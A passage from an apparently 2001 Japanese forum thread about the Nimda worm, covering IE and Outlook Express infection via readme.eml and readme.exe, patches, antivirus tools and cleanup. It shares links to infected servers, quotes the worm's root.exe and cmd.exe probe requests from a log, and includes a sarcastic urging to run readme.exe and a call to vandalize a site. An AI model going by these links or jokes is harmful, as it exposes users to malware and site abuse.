
>1.IE5SP1等でnimdaで書き換えられたホームページをアクセスしたとき・・
> readme.emlファイルは、ファイルが自分のパソコンにダウンロードされてから
> IEで開かれるのですか?それとも、ファイルにはならず そのままIEで開かれ
> reame.exeがダウンロードされるのですか?

---
答えになってないかもしれんんが、この辺参照してくれ。

>>569
>>572
>>576
>>579
>>580

要はreadme.emlや、reame.exeという名前とは限らない。
そのWebページがキャッシュされた中に潜んでいることもあるようだ。
readme.emlや、reame.exeばかりに気をとられていると落とし穴があるぞ。

699 : :01/09/22 16:21
>>696
IE5.01SP2 やIE5.5SP2 ならOK ってこと?

700 :感謝(-人-) :01/09/22 16:23

偉大な人柱のみなさまに感謝(-人-)

>>696
>>697
>>698

この中に含まれている枝リンク孫リンクのみなさんも含めて(-人-)
このスレで偉大な実験や衝撃の体験を告白してくださったみなさんに感謝(-人-)

みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)

701 :名無しさん@お腹いっぱい。:01/09/22 16:37
ハッ!!(・д・)

これ読むと、
>>460-464

readme.emlファイル
reame.exeファイル
nimda感染ファイル

を手動で検索しちゃダメぢゃん!場合によってはさわっただけで感染するし、その場合ドラッグや右クリックで削除できない(感染する)じゃん!!

702 :名無しさん@お腹いっぱい。:01/09/22 16:50
>>699
もう一回ここのスレも含めて関連スレ読み返せよ。

703 : :01/09/22 16:56
感染してるサイトにURLきぼんぬ
このOS,今日クリーン再セットするから、わざと感染させて病状を
実際に見てみたい

704 :名無しさん@お腹いっぱい。:01/09/22 16:57
>>701
dos窓やコマンドプロンプトから削除すれば大丈夫じゃないの?

705 :名無しさん@お腹いっぱい。:01/09/22 17:02
>>703

はいよ

ttp://210.124.76.100/

ttp://210.180.38.194/
ttp://210.12.193.252/
ttp://210.110.148.141/

ttp://210.12.157.160/

706 :名無しさん@お腹いっぱい。:01/09/22 17:03
>>705
有難う
間違えて違うドライブにOSを入れてしまっだ。

707 :>>705:01/09/22 17:04
複合感染してるのもあるから

もしBIOSまで消されてもしらねえよ。

708 :704:01/09/22 17:07
ノートンが反応してウイルスを削除してくれた、初めて役たったな。

>707
BIOSの破壊はプロテクト掛けてるので、マズないよ。
破壊されてもロムライターで焼き直す

709 :名無しさん@お腹いっぱい。:01/09/22 17:07
うちのIISサーバ、対応したはずなんだけど
http://www.eeye.com/html/Research/Tools/nimda.html
ここのスキャンツール使って確認したら「INFECTED」って出てきた。
「Open Guest Share」って出てるんだけど、どういう意味だろう?
Guestアカウント無効にしてAdministratorsグループから削除した
だけじゃダメなのかな?

710 :名無しさん@お腹いっぱい。:01/09/22 17:07
しつこいようですが
>>705のURLってIE5.01SP2でJavaScriptをオフにしてDLしなければ大丈夫なんですよね?

711 :709:01/09/22 17:11
ログを見る限りじゃアタックによる再感染はしてないようなんだけど…。
> GET /scripts/root.exe 404
> GET /MSADC/root.exe 404
> GET /c/winnt/system32/cmd.exe 404
root.exeに404で返して、admin.dllも受け取ってない。

712 :名無しさん@お腹いっぱい。:01/09/22 17:11
これすげえな。

ttp://210.12.157.160/

何種入ってるんだ?

713 :名無しさん@お腹いっぱい。:01/09/22 17:14
>>712

っていうかこいつらバックドア開けっ放しじゃない?

進行形でいろんなものどんどんぶち込まれてない?(^^;

714 :名無しさん@お腹いっぱい。:01/09/22 17:16
>>704

そういうことだが、初期の対策ページにはreadme.emlを検索し削除・・なんて書いてあったぞ。

その場合パンピーはDOS窓でやるか?

715 :>>705:01/09/22 17:19
>>710

>>713っていうわけだから何なら平気とは言えない。自己の責任でやってくれ。

716 :化石スマソ:01/09/22 17:40
>>117

まかふぃーって・・。


16 名前:名無しさん@お腹いっぱい。 本日の投稿:01/09/22 13:35
ウイルススキャンオンラインを買った・・・・
検知、駆除以前にかってないほどのクソソフトだった・・・

1)設定項目が異常に少ない(;´Д`)
  つーか自動更新の日付しか設定するところがない(;´Д`)
2)何かするた度にhtmlっぽい画面を出すが非常に重い(;´Д`)
3)更新が自動更新のみ。しかも度々タイムアウトで止まる(;´Д`)
4)なんと複数ドライブのスキャンが出来ない(;´Д`)
5)ウイルスが見つかった場合「駆除」「削除」から選ぶが、複数の感染
  ファイルを同時に選べない。例えばNimdaの*.emlファイルが2,000個
  見つかった場合、一つ一つクリックして削除する(;´Д`)
  しかも削除中にうっかり戻ったり終了させたりするとスキャンから
  やり直し。(;´Д`)
6)鬼のように低機能。メニューがActive Shield、Scan、Rescue Disk作成、
  自動アップデートしかない。しかも全て重い(;´Д`)
  Scanのオプションは「全てのファイル」「サブディレクトリ」
  「圧縮ファイル」「ヒューリスティック」のみ。しかも全てのファイ
  ルのチェックを入れない場合*.exeファイルしか検査しない。設定も
  ない(;´Д`)
  ウイルスが見つかった場合も「削除」「駆除」のみ(;´Д`)
  ログ機能が全くないウイルスソフトは使えない。(;´Д`)

717 :名無しさん@お腹いっぱい。:01/09/22 17:49
>>712
それでもアクセスできるんだからすげぇ回線とCPU使ってるんだな。
ちょっとウラヤマシイ。

718 :名無しさん@お腹いっぱい。:01/09/22 18:02
117って・・。

23 名前:おいおい 投稿日:2001/08/15(水) 12:54
ウイルス定義ファイル(DATファイル)をアップデートしたら、

SCAN32 のページ違反です。
モジュール : MCSCAN32.DLL、アドレス : 017f:004d103f

とエラーが出てしまい、使えなくなってしまった。
サポートによると、プレインストール版はエンジンのアップデートの権利がないので、
解決したければ、優待版を買え!だとさ。

http://www.nai.com/japan/pqa/aMcAfeeDatFile.asp?ancQno=DT01080901&ancProd=McAfeeDatFile

DATを更新させといて、使えなくするなんて、なんか姑息じゃないか?
使えなくなるんだったら、DATの更新を出来なくしておくとか、せめて警告するとか。
6月に更新したDATのままでいいから、せめて、それに戻せればいいけど、出来ないみたいだし。
古いプレインストール版の人は、もうDATの更新しないことだよ。
単に使えなくなるだけだから。

719 : :01/09/22 18:18
>>710

コードレッドでバックドア仕掛けられたサーバーへ行くのは
テロの山岳地帯へ行くようなものです。

特殊部隊に入隊希望の方は、
HTMLの動作しないブラウザを使ってください。

もちろん、とろい木馬ことアウトっ!ルックなどは
持っているだけで入隊禁止となります。

なぜなら、他の隊員の迷惑になるからです。

720 :d:01/09/22 18:24
教えて下さい。初心者なんですが友達に一般のパソコンは
うつらないっていわれたんですけど本当ですか?
一応アップデートしたんですけどversion 5,0,3802,0というので
あってますでしょうか。。。バカにされてもいいので誰か詳しい方
教えて下さい。お願いします。

721 :名無しさん@お腹いっぱい。:01/09/22 18:27
>>720
pc初心者の所で聞いてみませんか?

722 : :01/09/22 18:29
>>720

伝染るんです。

ヘルプのバージョン情報の
更新バージョン
のところを見てください。
SP2になってますか?

723 :ゴルァ!!!!!!!!!:01/09/22 18:33
host-A218.nec-media.com
CODE RED , NIMDA に感染。

724 :名無しさん@お腹いっぱい。:01/09/22 18:43
>>723

ttp://host-a218.nec-media.com/

ぉ。

725 :>>705 :01/09/22 18:46
>>720
>友達に一般のパソコンは うつらないっていわれた

からかわれています。
そいつと縁を切るか、そいつのいうパソコンの話は一切信用しないようにしましょう。

それでも友情を信じたいなら確認する方法はありますが・・。

726 :名無しさん@お腹いっぱい。:01/09/22 18:51
>>720
>友達に一般のパソコンは うつらないっていわれた

一般的でないパソコンは うつらないの誤りと思われ(w

727 :名無しさん@お腹いっぱい。:01/09/22 19:06
なんでいまさら感染するかなぁ・・。

ttp://www.powerstage.com/~kenmokujyu/exam/kentiku/

728 :無しさん@お腹いっぱい。:01/09/22 19:07
>>724
VBエラーはワームと関係あるんですか?

729 :名無しさん@お腹いっぱい。:01/09/22 19:09
また閉じちゃったよ。再発したのかな?(w

http://www.fdc.or.jp/owari/cad/

730 : :01/09/22 19:09
んで、nimdaちゃんはおとなしくなったん?
どうよ?

731 :名無しさん@お腹いっぱい。:01/09/22 19:10
>>728

てゆーかここホストなのになんで入れるの?(w

732 :名無しさん@お腹いっぱい。:01/09/22 19:11
>>730

>>727みろ。

733 :名無しさん@お腹いっぱい。:01/09/22 19:18
>>696
IE6の標準インストールですが、私も実際にtest.emlを作って
やってみたところMediaPlayerが起動しました。

そこで以前のバージョンであるIE5.5SP2に戻してもう一度
やってみました。ところがこちらのほうも見事にMediaPlayer
が起動しちゃいました。

もちろん最新の更新ファイルでウィルス検索もやってみましたが
何も出て来ず、また関連があると思われるファイル名、拡張子で
検索しても何もヒットせず・・・。
http://memo.st.ryukoku.ac.jp/archive/200109.month/1346.html
ここに紹介されているソースでやってみても「安全」と出ました。

MediaPlayerの起動と脆弱性の問題は関係ないかもしれません。
IE5.5SP2でも同じ結果が出たのですから。

734 :無しさん@お腹いっぱい。:01/09/22 19:19
>>732
何か変? 普通に見える。

735 :名無しさん@お腹いっぱい。:01/09/22 19:20
>>720
このスレの特徴として有益な情報のリンクも多いが一発感染するリンクも多数存在する。
自分が初心者と思うならあまりこのスレには来ない方がいい。

http://news.2ch.net/test/read.cgi?bbs=news&key=1001009235
初心者ならこちらがお勧め。(このリンクは感染の危険性ありません)

736 :無しさん@お腹いっぱい。:01/09/22 19:21
>>731
何のホスト?

737 :名無しさん@お腹いっぱい。:01/09/22 19:23
>>733

> そこで以前のバージョンであるIE5.5SP2に戻してもう一度

ここがクサイ。

> MediaPlayerの起動と脆弱性の問題は関係ないかもしれません。
> IE5.5SP2でも同じ結果が出たのですから。

こうした特殊な条件での検証だけで6が安全だという理由にはならないだろう。
現実にインストールの仕方如何で6も危険であるとMS自身が言っているのだから。

より上位のバージョンがした設定を下位のバージョンが上書きされたときにそのまま
にしてしまうのはMSではよくあることだ。

新たな危険パターンを発見しただけかもしれない。

738 :名無しさん@お腹いっぱい。:01/09/22 19:26
>>734

オマエ感染シチャターヨ(;´Д`)

739 :名無しさん@お腹いっぱい。:01/09/22 19:28
>>727は再感染だね。ちゃんと対処したんかコラァ

740 :無しさん@お腹いっぱい。:01/09/22 19:31
>>738

Netscapeで?

741 :名無しさん@お腹いっぱい。:01/09/22 19:35
>>739

最初このしたの階層が感染していたみたいで、お気楽にそこを閉じて済ませたみたいな。

最初に感染して閉じただけのところ ρ(^-^)
ttp://www.powerstage.com/~kenmokujyu/exam/kentiku/kentiku_S8.html
着工中現場のご案内

HTTP エラー 404
404 見つかりません
こんなのにまでぶちこまれてます。




742 :無しさん@お腹いっぱい。 :01/09/22 19:37
http://hp2.popkmart.ne.jp/yamun/
あらしてください。

743 :名無しさん@お腹いっぱい。:01/09/22 19:37
>>740

紛らわしい書き方するな。ネスケユーザーの冷やかしなら逝ってヨシ!

ここはそういう場所じゃないんだ。ネスケ自慢はヨソでやってくれ。

744 :名無しさん@お腹いっぱい。:01/09/22 19:38
>>742

おい>>740 、ここはどう見える?

745 :740:01/09/22 19:41
Netscapeで普通に見える理由がわかった。
htmlタグを二重に切ってあるから、無視されてる。

746 :名無しさん@お腹いっぱい。:01/09/22 19:42
ttp://www.powerstage.com/default1.asp
トップページ見ると人集めしてる・・・被害結構ありそうだよ。

747 :740:01/09/22 19:43
>>742
やっぱり普通。

748 :名無しさん@お腹いっぱい。:01/09/22 19:44
>>747

いいかげん気付けよ!!

749 :名無しさん@お腹いっぱい。:01/09/22 19:46
>>734

誤解のないように言っておくと、IEでこうなったヒトは感染です。

750 :名無しさん@お腹いっぱい。:01/09/22 19:51
>>739

もしかしてここ、バックドアも標準装備?(^^;

751 :名無しさん@お腹いっぱい。:01/09/22 19:59
ニムダ感染 2日間で150件

752 :名無しさん@お腹いっぱい。:01/09/22 20:05
別スレでも同じことを書きまくってる742の意図は?

753 :名無しさん@お腹いっぱい。:01/09/22 20:06
>>752
そのサイトの管理人でアラシのIPコレクションしている。

754 :名無しさん@お腹いっぱい。:01/09/22 20:08
>>752
アクセスログから串収集してんじゃね〜の?

755 :名無しさん@お腹いっぱい。:01/09/22 20:09
>>752
クッキー情報ハイシャクくしてるのかも。

756 :名無しさん@お腹いっぱい。:01/09/22 20:09
>>753
きり番ってずっと400のまま?

757 :名無しさん@お腹いっぱい。:01/09/22 20:14
>>752
本当にあらされてるよ。

758 :名無しさん@お腹いっぱい。:01/09/22 20:17
>>757
マヌケな奴らだ。

759 :d:01/09/22 20:26
735の方有り難うございます。そうですよね。なんかリンクがいっぱい
で押していいのか迷っていたんで。。。早速行ってみますね。
はぁ、うつってないといいんだけど。。。

760 :名無しさん@お腹いっぱい。:01/09/22 20:34
今回のウィルスは複合化しているから分かりにくいなぁ。

761 : :01/09/22 20:56
>>760
ニムダbyサーバーサイドすれと、
ニムダbyクライアントサイドすれ、
別々に立てれば良いんじゃない??
このスレは、今のところクライアント寄りの議論?中心ね。

762 :名無しさん@お腹いっぱい。:01/09/22 21:11
>>761

それでうまくいけば問題ないけど、被害受けるヒトはそのへんがわかってないから被害受けてるんじゃないのかなあ・・。

ここを読んでいると被害報告でもそういうのがおおかったり。でも有益な情報はそこから生まれて来るんだなあ・・。

763 :ムズカシイ...:01/09/22 21:14

┏━━━┓  ┏━ヒョンテ電子@感染中━━━┓
┃ IE  . ┃  ┃ JavaScript@readme.eml ..┃
┃(´д`)..┃←..┃┏━━━━━━━━━┓......┃
┃ マターリ..┃  ┃┃wavですが(゚Д゚)何か?┃......┃
┗━━━┛  ┃┃(((((((readme.exe)))))).┃......┃
         .┃┗━━━━━━━━━┛......┃
         .┗━━━━━━━━━━━━┛

 IE
(´д`)<読み込んだHTMLのJavaScriptで、読込先がreadme.emlになってるけど...オカシイヨナァ
 IE
(´д`)<まぁ、emlの関連付けはOEになってるから、OEに渡しとくか...

┏━━━━━━━━━━━━━━━━━━━┓
┃ OE  ←  readme.eml  ←    IE   ...┃
┃(´д`)┏━━━━━━━━━┓  (´д`)  ┃
┃ マターリ┃wavですが(゚Д゚)何か?┃ OEさーん . ┃
┃   ...┃(((((((readme.exe)))))).┃.....メールデスヨー┃
┃   ...┗━━━━━━━━━┛       ...┃
┗━━━━━━━━━━━━━━━━━━━┛

┏━━━━━━━━━━━━━━━━┓
┃ OE  .  .┏━━━━━━━━━┓ ┃
┃(´д`)   ..┃wavですが(゚Д゚)何か?┃ ┃
┃シンヨウスルヨ.┃(((((((readme.exe)))))).┃....┃
┃      .┗━━━━━━━━━┛ ┃
┗━━━━━━━━━━━━━━━━┛

┏━━━━━━━━━━━━━━━━┓
┃ OE                  ...........┃
┃(;゚д゚)  本当はEXEダヨン(゚∀゚)アーヒャヒャ ┃
┃ダマサレタァ アヒャ゚∀゚)readme.exe(゚∀゚アヒャ ┃
┃      .                 ┃
┗━━━━━━━━━━━━━━━━┛

764 :ムズカシイ....:01/09/22 21:14
┏━━━━━━━━━━━━━━━━┓ 
┃Windows                ........┃ 
┃(゚∀゚)  (゚∀゚)アーヒャヒャ (゚∀゚)アーヒャヒャ. .....┃
┃アーヒャヒャ......アヒャ゚∀゚)readme.eml(゚∀゚アヒャ┃
┃readme.eml readme.eml readme.eml....┃           
┗━━━━━━━━━━━━━━━━┛           
  (゚∀゚)アーヒャヒャヒャ ゾウショクダヨーン
          ┃
━━━┳━マイクロソフトネットワーク、インターネット、ローカルファイルシステム、メール...━━━━╋━━━━
   .....┃           ┃                      (゚∀゚)ソーシン!アーヒャヒャ
  (゚∀゚)アーヒャヒャ   (゚∀゚)アーヒャヒャヒャ     ┏━━━━━━━━━━━━━━━━━━━━━━┓
┏(´д`)HTML━┓┏(゚д゚)IIS━━━━━┓ ┃Address: 受信トレイに有るメールのメールアドレス宛て┃
┃       .......┃┃            ┃ ┃中身:   readme.eml                   ┃
┃       .......┃┃ボクノサイトにオイデヨ!! ┃.┃(゚∀゚)アヒャヒャwaveダヨーンヒーヒヒヒ               .┃
┃ (´д`)   ....┃┃  (・∀・)カエレ!!   ┃.┃(((((((((((((readme.exe)))))))))))              .┃
┃ マターリ    ..┃┃            ┃ ┗━━━━━━━━━━━━━━━━━━━━━━┛
┗(´д`)HTML━┛┗(゚д゚)IIS━━━━━┛
    ↓           ↓
┏(゚∀゚)HTML━┓ ┏(゚∀゚)IIS━━━━━┓
┃readme.eml .┃ ┃プレゼントダヨ!!   ......┃
┃ (゚∀゚)アヒャ . ┃ ┃readme.eml    ......┃
┃アーヒャヒャヒャ  ┃ ┃(゚∀゚)ヨメ!!!!アーヒャヒャ!!..┃
┗(゚∀゚)HTML━┛ ┗(゚∀゚)IIS━━━━━┛

765 :688:01/09/22 21:16
>>697
>>698

ありがとうございました

766 :名無しさん@お腹いっぱい。:01/09/22 21:17
(・∀・)ナルホド!!

767 :名無しさん@お腹いっぱい。:01/09/22 21:18
>>763,764
ご苦労、感動した。

768 :名無しさん@お腹いっぱい:01/09/22 21:22
バージョン情報みてIEのバージョン確認しろ とあるけど
IE5.01SP2って・・SP1って表示されませんでしたっけ?
ちがってたらスマヌ

769 :名無しさん@お腹いっぱい。:01/09/22 21:22
>>763
俺も感動した。でも763はあってる?
最初俺もそう思ってたが、
>>512
読んで間違っていたんだな、って思い直した。

770 :名無しさん@お腹いっぱい。:01/09/22 21:24
>>763-764

サイコー、わかりやすい!

771 :名無しさん@お腹いっぱい。:01/09/22 21:25
>>763-764

ワラタ

772 :名無しさん@お腹いっぱい。:01/09/22 21:31
なんかNimdaのアタック減ってきた。ログが綺麗!(・∀・)

773 :名無しさん@お腹いっぱい。:01/09/22 21:39
>>772
うちも。もう90分もアタック無いよ。

774 :名無しさん@お腹いっぱい。:01/09/22 21:41
>>772

まだまだ・・。明日あさってでも増えるよ・・。

ttp://www.powerstage.com/~kenmokujyu/exam/kentiku/

775 :名無しさん@お腹いっぱい。:01/09/22 21:44
>>745

だめぢゃん!ネスケで開発してる開発者は自分のサイトの感染気付かないぢゃん!

776 :ムズカシイ...:01/09/22 21:45
>>763
IEコンポーネントが駄目駄目という事でしょうかね。

777 :>>776は:01/09/22 21:46
>>769
です。。。

778 :名無しさん@お腹いっぱい。:01/09/22 21:46
>>774
ホームページスペースのレンタルしてるからね。
一体このサーバーには幾つのreadme.emlがあるんだろう?

779 :名無しさん@お腹いっぱい。:01/09/22 21:46
>>776

マカーに言わせたら、「関連づけ」ってのがダメダメって言うでしょうな・・。

780 :名無しさん@お腹いっぱい。:01/09/22 21:49
うわ。ネスケ4.7でもJAVAスクリプトをONにしてたら、
キャッシュに****.emlってのが出来て、ノートンでスキャンしたら
感染ファイルって言ってきたよ。このファイルもやばいのかな?

5.5SP2でもキャッシュに取り込まれたみたいで、ノートンが同じように
警告出してきた。
やっぱJAVAスクリプトは切っておいた方が安心かな。

781 :名無したんに接続中・・・:01/09/22 21:52
ダウンロードをキャンセルしてもキャッシュには残るからなぁ、
スキャンでそれに反応しあわてている人も多いみたい。

782 :名無しさん@お腹いっぱい。:01/09/22 21:52
減っては来てるけどまだ来るよ。
あんまり面白くないけどこことか。
http://210.221.55.61/

783 :名無しさん@お腹いっぱい。:01/09/22 21:52
>>778

もしかしてサイト管理者でも、しらないうちにreadme.exe実行してるのにW2KSP2だからおっけー!とかって、いがち?

HTMLなおして、readme.exe readme.eml削除してW2KSP2あてて、満足しちゃってるような管理者って、いがち?

こりゃあ、いま止まってるサイトが復活したころがやばいのかも・・。

784 :名無しさん@お腹いっぱい。:01/09/22 21:54
>>763 亀レススマヌ。コピペ苦手。
┏━━━━━━━━━━━━━━━━┓
┃ OE         ...........┃
┃(;゚д゚)  本当はEXEダヨン(゚∀゚)アーヒャヒャ ┃
┃#ダマサレタァ#アヒャ゚∀゚)readme.exe(゚∀゚アヒャ ┃
┃      .                 ┃
┗━━━━━━━━━━━━━━━━┛
ズレまくり↑スマヌ。。
#ダマサレタァ#は、チョと違う。理解すらしていない。(君じゃないぞ)
だからバグ。
??ワケワカラン??・・・って言ってる間に、アヒャ゚∀゚)readme.exe(゚∀゚アヒャ

readme.emlは実際HTML形式のメールだから、プレビュー時点で、
IE君にもう一度渡るの。んで、??ワケワカラン??って成るのは、結局
「IE君」。
だから、被害受けるアプリはIEなの。
んで、IE君が「ナニコレ??メデイアプレーヤ君なら解るかな?」
って言ってメデイアプレーヤ君も呼んじゃう。
して、違うぞ(#゚Д゚)って彼に怒られちゃう。ビクーリ!お漏らし。。。
してる間にOE君が「良いや、readme.exe君、遊ぼ」って実行しちゃ
う。
・・・メーラーがIEに「HTML形式のプレビューしてくれー」って言
っちゃうのはのは、OE君とIE君が仲良しだから(w
・・・・・・ウーン、イメージするの難しい。。

785 :名無しさん@お腹いっぱい。:01/09/22 21:55
>>781

.emlや、readme.exeを手動スキャンして、キャッシュの中のやつとか削除しようとしてさわって自爆、ってケースも多いような・・。

786 :名無しさん@お腹いっぱい。:01/09/22 21:58
>>775
IISなんて使いません。

787 :名無しさん@お腹いっぱい。:01/09/22 21:58
>>786

サーバが選べるやつはいいよ(w

788 :名無しさん@お腹いっぱい。:01/09/22 22:01
ねすけで普通に見えるって逝ってるやつ。
今6.1で確認したけど、ちゃんとダウンロードするか聞かれるよ。
開かないって逝ってるのは、JavaScript切ってるだろ。りぬのmozillaからも開くんでおかしいと思ったよ。

789 :名無しさん@お腹いっぱい。:01/09/22 22:02
http://housecall.antivirus.com/housecall/start_jp.asp

オンラインスキャン上手く表示できないのはおれだけ?

790 :780:01/09/22 22:02
>>785
ネスケでダウンロードの確認も出なかったんだよね。
別ウインドウが開いたけど、そこには
script:
って表示だけ。なんかおかしいと思ってノートンかけたら、
該当のキャッシュファイルが引っかかった。
これもさわったら、やばいんだろうねぇ。

791 :名無しさん@お腹いっぱい。:01/09/22 22:03
>>786
おれは、Peer Web Server3.0ですがなにか?

792 :名無しさん@お腹いっぱい。:01/09/22 22:04
>>772-773

かなりの数の感染サイトがただ線を抜いただけのような状態と思われ・・。

パッチ当てなど対策をやったとしても、そういうサイトは駆除漏れやredeme.exe手動実行(!)なんかで復活しちゃいそうな肝・・。

793 :ムズカシイ...:01/09/22 22:04
>>784
(´д`)ヾ解説どうもです

794 :名無しさん@お腹いっぱい。:01/09/22 22:04
教えて下さい。

社内LANで感染する経路に共有があるんですけど、
これって共通のアカウントをきちんと設定しとけば、
知らないところから感染するって事は無いんですよね?

共有公開しているユーザが感染してないのに、
感染した場合は「共有経路ではない」と判断して
良いですか?

795 :名無しさん@お腹いっぱい:01/09/22 22:05
手動削除のときは・・
フォルダオプションの「Webの表示」を切ってから検索→削除
ですな

796 :名無しさん@お腹いっぱい。:01/09/22 22:06
>>788
6.1で確認したからだろ。
こっちは4.78。
タグの解釈も変わってるんだよ。

797 :名無しさん@お腹いっぱい。:01/09/22 22:06
>>791

とりあえず感染サイト逝ってredeme.exe手動ダウンロードして手動実行しとけ。

798 :名無しさん@お腹いっぱい。:01/09/22 22:07
>>790
SAMBAでりぬの方にreadme.exeとreadme.emlを保管してあるけど
触った時点でウィルスバスターが検知するから右クリックさえも
出来ないよ。間違ってクリックとかファイル操作も不可能。

799 :名無しさん@お腹いっぱい。:01/09/22 22:09
>>796

ねすけねすけって、6と4、どっちが本流なんだよ。6出た後も4のバージョン上がってるみたいだし。
破綻してるんじゃないの?

800 :名無しさん@お腹いっぱい。:01/09/22 22:10
>>790
ノートンAVの設定が甘いなあ。
ウチではネスケ4.78がキャッシュファイルを作った瞬間に発動→削除となるぞ。

801 :名無しさん@お腹いっぱい。:01/09/22 22:10
キャッシュのはそのキャッシュを使うアプリが消す手段を持ってるから
手動で消そうとしない方がいいね。

802 :名無しさん@お腹いっぱい。:01/09/22 22:14
>>799
4のバージョンアップはセキュリティー方面のバグ潰しだけ(のような物)。
(ちなみに3の最後のバージョンは4が出で1年後に出た。)

803 :名無しさん@お腹いっぱい。:01/09/22 22:14
>>789

逝ってみた。

いまだ異常に思いのだと思われ。

804 :名無しさん@お腹いっぱい。:01/09/22 22:16
>>799
両方いれてますがなにか?
>>796 >>780
今確認しました。確かに別ウィンドウが開くだけだね。
こんからだとウィンドウズさえ開かないけど。

805 :名無しさん@お腹いっぱい。:01/09/22 22:16
>>802

だから、これからねすけってなったら何使えばいいの?

806 :790:01/09/22 22:17
>>800
むむ。そうかも。
今までは、ファイルのオープン、コピー、移動時のチェックは
OFFになってて、チェックするファイルも感染しそうなファイル
だけにしてました。
すべてにのファイルをチェックするようにして、ファイルのオープン
コピー、・・・もONにしときました。これなら大丈夫かな・・・。

807 :名無しさん@お腹いっぱい。:01/09/22 22:18
>>799
波状とはIEのことですか?

808 :名無しさん@お腹いっぱい。:01/09/22 22:18
>>804

両方いれてますがなにか?

#きっと帯に短したすきに長し・・なんだな(ぼそっ

809 :802:01/09/22 22:22
>>805
どっちかって言うと6かなぁ…CSSとかまともだし。
#俺も両方だしなぁ…

810 :名無しさん@お腹いっぱい。:01/09/22 22:23
つかぬことを聞きますが、ここってぢゃばすくりぷとオフだと、もしかして・・?

http://housecall.antivirus.com/housecall/start_jp.asp

811 :名無しさん@お腹いっぱい。:01/09/22 22:25
ttp://210.65.38.221/
ここ、まるで輪姦状態みたい。みごとにやられてる。
逝くひとは気をつけてね。

812 :名無しさん@お腹いっぱい。:01/09/22 22:26
>>794
>社内LANで感染する経路に共有があるんですけど、
これって共通のアカウントをきちんと設定しとけば、
知らないところから感染するって事は無いんですよね?

・・ちょっと甘い。使ってるOS/環境によっては。
NT系か9X系しか無いけど(w
NIMDAの感染経路と、特に利用するOSの脆弱性自分で調
べて列挙してみて。ココに貼る必要は無いぞ。
特に、OSの脆弱性は面倒だけど何とか自力で探して読ん
でみて。
敢えて役立ちそうに無いレス、、スマソ。

813 :名無しさん@お腹いっぱい。:01/09/22 22:27
>>810
.aspは、触りたくないから行かない(w

814 :名無しさん@お腹いっぱい。:01/09/22 22:30
>>810
ONにしてても今はダメみたい。

815 :名無しさん@お腹いっぱい。:01/09/22 22:31
>>805
これからを考えればやっぱり6系。
4系だと見れないページが最近増えてきた。
でも、あまり変なページみないのなら4系の方が良い。

816 :名無しさん@お腹いっぱい。:01/09/22 22:32
>>811

こういうところって、日本ではわりと少ないけど、
ニムダはともかくSadmindなんかにかかってるってことは先月のさわぎでもSP2なんか当然当ててないんだよねぇ・・。元は何のサイトだったんだろ。

817 :名無しさん@お腹いっぱい。:01/09/22 22:33
ANTIDOTEがいい。(・∀・)

818 :名無しさん@お腹いっぱい。:01/09/22 22:38
http://www2u.biglobe.ne.jp/~hole/

819 :名無しさん@お腹いっぱい。:01/09/22 22:39
>>812

ちなみに環境はNT系なんですけど、
Adminアカウントロック。Guestアカウントロック。

で、「共有」からの感染は防げると思ってたんですけど
まだ甘かったですか?

820 :追記:01/09/22 22:40
819の自己レス。

とりあえず、もうちょっと調べてきます。
>>812
レス、ありがとございました。

821 :ムズカシイ...:01/09/22 22:45
改ざんされたHTMLを覗いた場合は、IEがOEの代わりになるんですね。

822 :名無しさん@お腹いっぱい。:01/09/22 22:48
>>821

なんか窓内窓開くよねえ。

823 :名無しさん@お腹いっぱい。:01/09/22 22:49
すいません、困ってます。
 ニムダの駆除ツール使ったんですが、英語で「一つのW32.Nimda.A@mmを削除できませんでした」みたいなMSGがでてしまいました。
 そこで「Temporary Internet Files」の中のファイルを削除してから、再度駆除ツールを使ってみたんですが、今度は「W32.Nimda.A@mmはありませんでした」のような英語のMSGが出たんでいちおう安心しました。
 ところが、またPCをいろいろ操作した後に、再度駆除ツールを使ってみましたら、また前述のMSGがでてしまったのです。
で、先ほどの操作をくり返したところ、また「W32.Nimda.A@mmはありませんでした」というようなMSGがでてくれました。
ちなみにIEもSP2にアップして、ノートンのも最新のに更新してたんですが、結局これって駆除されてないんでしょうか?
お知恵貸してください。 (長文陳謝)

824 :名無しさん@お腹いっぱい。:01/09/22 22:49
>>819
共有だけにこだわっちゃうところが甘いと思った。
ちょっと、君の論点敢えてそらしたよ(w
意地悪でスマヌ。
共有ドライブスキャンする感染活動についてはそれで良いと思う。
でも、それで安心して別経路で感染すると結局共有再マウントされる。
君の使ってる環境や設定全て聞くつもり無いし。
でも、楽観的なことは言えない。特にこのウイルスに関しては。

825 :ある"管理"者:01/09/22 22:51
弐無だ対策で、全員LAN抜いてスキャンしろと言っているそばで、
もうちょっと待って、とか言っていつまでも繋いでいた某社の社長。

ワタクシは、「ばかやろう」と怒鳴ってその場でLAN引き抜いた。
また給料下がったぜ、クックックッ

826 :名無しさん@お腹いっぱい。:01/09/22 22:54
>>823

だから、再インストールしなさいって。
とにかくフォーマット!再いんすとーる。
まったくキチガイが多いなここは。

827 :名無しさん@お腹いっぱい。:01/09/22 23:01
>>823

英語のウイルスメッセージというのがこれではよくわからんです。

私のノートン先生は日本語のメッセージを出して下さいます。

英語版をご使用なら、同じウイルスでも日本語環境では駆除しきれないケースも考えられると思います。

心配ならツールではなくウイルスバスターの体験版を試してみてはいかがでしょう。

また、最新パターンファイルとおっしゃいますが、ニムダがみつかってからノートン先生だけで3回は更新されました。
それに使っていなければ意味ないです。
ノートン先生の更新もおそらく先週だけでも6回はやっていると思います。スキャンする前に必ずオンラインアップデートすべきかと。

ノートン先生をお持ちなら駆除ツールではなくノートン先生を信用してあげるべきではないかと。

実際体験したケースで、ある駆除ツールで、ファイルだけ駆除されてしまい、レジストリがそのままになってしまったが、そのあとはノートン先生もばすたーさんもこの状態を感染とみなさずレジストリを直してくれないということがありましたよ。

828 :名無しさん@お腹いっぱい。:01/09/22 23:01
>>823
あなたのような人は>>735逝って下さい。

829 :名無したんに接続中・・・:01/09/22 23:01
>>824
感染後アップデートしても全く意味がない
複数の駆除ツール(無料ででている)を試してみて、再起動後も
ダメならOS入れ直した方がいい

830 :名無しさん@お腹いっぱい。:01/09/22 23:04
>>826

そうそう、1ページ見るたび、だったよね(w

831 :名無しさん:01/09/22 23:09
IE6.0は大丈夫なの?

832 :名無しさん@お腹いっぱい。:01/09/22 23:11
>>831
IE6以前にあなたが危険です。

833 :名無しさん@お腹いっぱい。:01/09/22 23:13
>>831
>IE6.0は大丈夫なの?

さすがにコピペにも飽きてきたが・・。

---
